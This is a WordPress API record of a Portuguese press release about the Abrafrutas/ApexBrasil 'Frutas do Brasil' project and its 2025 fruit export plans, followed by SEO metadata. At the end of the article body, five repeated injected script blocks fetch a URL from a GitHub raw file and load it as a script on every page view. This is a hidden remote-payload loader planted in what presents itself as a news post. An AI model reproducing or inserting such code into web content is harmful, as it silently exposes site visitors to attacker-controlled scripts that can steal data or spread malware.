{"id":13021,"date":"2025-01-22T18:44:10","date_gmt":"2025-01-22T17:44:10","guid":{"rendered":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/?p=13021"},"modified":"2025-02-18T12:52:52","modified_gmt":"2025-02-18T11:52:52","slug":"projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025","status":"publish","type":"post","link":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/","title":{"rendered":"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025"},"content":{"rendered":"<p><em>Iniciativa setorial \u00e9 desenvolvida em parceria entre Abrafrutas e ApexBrasil <\/em><\/p>\n<p><strong>O<\/strong> ano de 2025 promete ser significativo para o projeto Frutas do Brasil, iniciativa da Associa\u00e7\u00e3o Brasileira dos Produtores e Exportadores de Frutas e Derivados (Abrafrutas) em parceria com a Ag\u00eancia Brasileira de Promo\u00e7\u00e3o de Exporta\u00e7\u00f5es e Investimentos (ApexBrasil). Com foco na expans\u00e3o das exporta\u00e7\u00f5es de frutas brasileiras, o projeto prev\u00ea uma s\u00e9rie de a\u00e7\u00f5es estrat\u00e9gicas para consolidar a presen\u00e7a no mercado internacional.<\/p>\n<p>&#8220;Iremos participar de quatro grandes feiras internacionais: Fruit Logistica em Berlim, Fruit Attraction em S\u00e3o Paulo e Madri, e a Asia Fruit Logistica em Hong Kong, na China. Al\u00e9m disso, organizaremos o Frutas do Brasil Festival, em colabora\u00e7\u00e3o com influenciadores digitais e com o apoio das Embaixadas do Brasil na Europa e na \u00c1sia&#8221;, diz Jorge de Souza, gerente t\u00e9cnico da Abrafrutas.<\/p>\n<p>Segundo o dirigente, os eventos que o projeto Frutas do Brasil Festival participa t\u00eam se mostrado uma ferramenta eficiente para promover os sabores, a diversidade e a qualidade das frutas brasileiras nos mercados-alvo. &#8220;O envolvimento de influenciadores digitais e a parceria com as embaixadas refor\u00e7am a visibilidade do projeto e ajudam a conquistar novos p\u00fablicos.&#8221;<\/p>\n<p>Com essas a\u00e7\u00f5es, o objetivo \u00e9 aumentar o volume de exporta\u00e7\u00f5es e ampliar a base de clientes, fortalecendo a competitividade do Brasil no cen\u00e1rio global de frutas. As recentes aberturas de novos mercados, como a exporta\u00e7o de uva para a China e o avocado para o Chile, evidenciam o potencial de expans\u00e3o, mas tamb\u00e9m exigem avan\u00e7os constantes em qualidade, log\u00edstica e negocia\u00e7\u00f5es bilaterais.<\/p>\n<p>A expectativa para 2025 reflete o compromisso da Abrafrutas e da ApexBrasil em posicionar as frutas brasileiras como refer\u00eancia em qualidade e inova\u00e7\u00e3o, contribuindo para o crescimento econ\u00f4mico e sustent\u00e1vel do setor.<\/p>\n<p>Al\u00e9m de impulsionar as exporta\u00e7\u00f5es tradicionais, a Abrafrutas planeja continuar investindo em inova\u00e7\u00e3o e sustentabilidade, promovendo a\u00e7\u00f5es que evidenciem a qualidade e a responsabilidade ligadas aos temas em ESG (Ambiental, Social e Governan\u00e7a) dos produtos brasileiros. O objetivo \u00e9 n\u00e3o apenas manter o crescimento em mercados tradicionais, como Europa e Estados Unidos, mas tamb\u00e9m consolidar novos mercados na \u00c1sia e na \u00c1frica.<\/p>\n<p>\u201cA fruticultura brasileira vive um momento de expans\u00e3o, e o aumento nas exporta\u00e7\u00f5es em 2024 comprova o trabalho \u00e1rduo dos nossos produtores e a capacidade do Brasil de atender \u00e0s exig\u00eancias internacionais. Estamos confiantes de que 2025 ser\u00e1 um ano com mais oportunidades e avan\u00e7os para o setor\u201d, afirma Guilherme Coelho, presidente da Abrafrutas.<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Iniciativa setorial \u00e9 desenvolvida em parceria entre Abrafrutas e ApexBrasil O ano de 2025 promete ser significativo para o projeto Frutas do Brasil, iniciativa da Associa\u00e7\u00e3o Brasileira dos Produtores e Exportadores de Frutas e Derivados (Abrafrutas) em parceria com a Ag\u00eancia Brasileira de Promo\u00e7\u00e3o de Exporta\u00e7\u00f5es e Investimentos (ApexBrasil). Com foco na expans\u00e3o das exporta\u00e7\u00f5es&#8230;<\/p>\n","protected":false},"author":3,"featured_media":13011,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","inline_featured_image":false,"footnotes":""},"categories":[90],"tags":[],"class_list":["post-13021","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-release-pt"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025 - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025 - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\" \/>\n<meta property=\"og:description\" content=\"Iniciativa setorial \u00e9 desenvolvida em parceria entre Abrafrutas e ApexBrasil O ano de 2025 promete ser significativo para o projeto Frutas do Brasil, iniciativa da Associa\u00e7\u00e3o Brasileira dos Produtores e Exportadores de Frutas e Derivados (Abrafrutas) em parceria com a Ag\u00eancia Brasileira de Promo\u00e7\u00e3o de Exporta\u00e7\u00f5es e Investimentos (ApexBrasil). Com foco na expans\u00e3o das exporta\u00e7\u00f5es...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\" \/>\n<meta property=\"og:site_name\" content=\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/\" \/>\n<meta property=\"article:published_time\" content=\"2025-01-22T17:44:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-02-18T11:52:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2000\" \/>\n\t<meta property=\"og:image:height\" content=\"1332\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Leandro Ursulano\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Leandro Ursulano\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\"},\"author\":{\"name\":\"Leandro Ursulano\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509\"},\"headline\":\"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025\",\"datePublished\":\"2025-01-22T17:44:10+00:00\",\"dateModified\":\"2025-02-18T11:52:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\"},\"wordCount\":449,\"publisher\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg\",\"articleSection\":[\"Release\"],\"inLanguage\":\"es-ES\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\",\"name\":\"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025 - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\",\"isPartOf\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg\",\"datePublished\":\"2025-01-22T17:44:10+00:00\",\"dateModified\":\"2025-02-18T11:52:52+00:00\",\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg\",\"contentUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg\",\"width\":2000,\"height\":1332},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/\",\"name\":\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\",\"description\":\"Bienvenido a Fruit Attraction Sao Paulo, la Feria Internacional del Sector de Frutas y Hortalizas. Haz click y descubre todas las novedades de la edici\u00f3n de este a\u00f1o.\",\"publisher\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization\",\"name\":\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg\",\"contentUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg\",\"width\":400,\"height\":300,\"caption\":\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\"},\"image\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/\",\"https:\/\/www.instagram.com\/fruitattraction_saopaulo\/\",\"https:\/\/www.linkedin.com\/company\/fruit-attraction-so-paulo\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509\",\"name\":\"Leandro Ursulano\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g\",\"caption\":\"Leandro Ursulano\"},\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/author\/leandro\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025 - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/","og_locale":"es_ES","og_type":"article","og_title":"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025 - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","og_description":"Iniciativa setorial \u00e9 desenvolvida em parceria entre Abrafrutas e ApexBrasil O ano de 2025 promete ser significativo para o projeto Frutas do Brasil, iniciativa da Associa\u00e7\u00e3o Brasileira dos Produtores e Exportadores de Frutas e Derivados (Abrafrutas) em parceria com a Ag\u00eancia Brasileira de Promo\u00e7\u00e3o de Exporta\u00e7\u00f5es e Investimentos (ApexBrasil). Com foco na expans\u00e3o das exporta\u00e7\u00f5es...","og_url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/","og_site_name":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","article_publisher":"https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/","article_published_time":"2025-01-22T17:44:10+00:00","article_modified_time":"2025-02-18T11:52:52+00:00","og_image":[{"width":2000,"height":1332,"url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg","type":"image\/jpeg"}],"author":"Leandro Ursulano","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Leandro Ursulano","Tiempo de lectura":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#article","isPartOf":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/"},"author":{"name":"Leandro Ursulano","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509"},"headline":"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025","datePublished":"2025-01-22T17:44:10+00:00","dateModified":"2025-02-18T11:52:52+00:00","mainEntityOfPage":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/"},"wordCount":449,"publisher":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization"},"image":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage"},"thumbnailUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg","articleSection":["Release"],"inLanguage":"es-ES"},{"@type":"WebPage","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/","name":"Projeto Frutas do Brasil tem como meta ampliar ainda mais as exporta\u00e7\u00f5es em 2025 - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","isPartOf":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage"},"image":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage"},"thumbnailUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg","datePublished":"2025-01-22T17:44:10+00:00","dateModified":"2025-02-18T11:52:52+00:00","inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/"]}]},{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/projeto-frutas-do-brasil-tem-como-meta-ampliar-ainda-mais-as-exportacoes-em-2025\/#primaryimage","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg","contentUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2025\/01\/FRUIT_ATTRACTION_18042024_15H_WTF13629.jpg","width":2000,"height":1332},{"@type":"WebSite","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/","name":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","description":"Bienvenido a Fruit Attraction Sao Paulo, la Feria Internacional del Sector de Frutas y Hortalizas. Haz click y descubre todas las novedades de la edici\u00f3n de este a\u00f1o.","publisher":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"},{"@type":"Organization","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization","name":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/","logo":{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg","contentUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg","width":400,"height":300,"caption":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL"},"image":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/","https:\/\/www.instagram.com\/fruitattraction_saopaulo\/","https:\/\/www.linkedin.com\/company\/fruit-attraction-so-paulo\/"]},{"@type":"Person","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509","name":"Leandro Ursulano","image":{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g","caption":"Leandro Ursulano"},"url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/author\/leandro\/"}]}},"_links":{"self":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts\/13021","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/comments?post=13021"}],"version-history":[{"count":6,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts\/13021\/revisions"}],"predecessor-version":[{"id":27722,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts\/13021\/revisions\/27722"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/media\/13011"}],"wp:attachment":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/media?parent=13021"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/categories?post=13021"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/tags?post=13021"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}